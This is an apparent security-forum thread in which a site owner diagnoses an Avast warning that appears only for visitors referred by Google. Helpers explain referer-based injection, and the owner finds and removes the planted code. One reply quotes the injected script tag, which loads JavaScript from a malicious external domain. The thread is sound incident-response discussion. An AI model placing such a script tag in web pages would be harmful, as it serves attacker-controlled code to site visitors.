Avast blocking our site when coming from a link in google.

I was notified by a user last night that said his avast would block him when clicking a link through google search but if he either typed in the url normally or through a bookmark the page would show fine and not trigger avast.

So I installed avast on my pc this morning so I could test it out also. I am having the same experience. Before doing a search on google and with avast installed I was able to browse any page on our site with no issues. So I then opened a new tab and did a search on google with our sites name as a keyword to get a link to come up. I clicked on one and sure enough avast blocked it.

I did a google search for the reason avast gave and noticed quite a few others along with links to sites to check. Both sucuri and virustotal show clean. The message avast gave was oursite.com/{gzip} and infection being HTML:Script-Inf.

Our site is gardentractortalk.com, please steer me in the right direction to get this resolved.

Hi,
This is a common tactic by the bad guys: only show malicious code when the referer is google or some other major search engines. Most people go through these sites to get to your website, and this makes it more difficult for the owner to find out what is happening (wget, for example, would return a clean site, when the referer is not set).

In your case, this code seems to be appended when ref=google:

<script type="text/javascript" src="http://gouremntis.com/?L_7Wec=W1ufHddRf_2T9js2zdNV2wY9&fBZ=G2LH20ht5VT7pfwcehat5_Y7Y"></script>

I imagine this is definitely not intentional.

You need to find the PHP code (will be most likely obfuscated) that is checking referer and inserting this code, and then avast will stop complaining:-).
Honza

Thanks for the help. It is all coming together now as I had found an error when doing a inspect element in chrome after clicking a link from google search to the site and it had that gourementis in it. But when doing a page refresh it disappeared. I guess I will start going through each file one by one.

Gouremntis dot com is a spam domain and domain has now been locked
http://www.whoismind.com/whois/gouremntis.com.html

polonus

I am happy to report that I have been able to find the injected code and resolve the issue. With it only affected the referred visitors I definitely wouldn’t have found it if a member with avast wouldn’t have given me the information he did along with HonzaZ’s reply.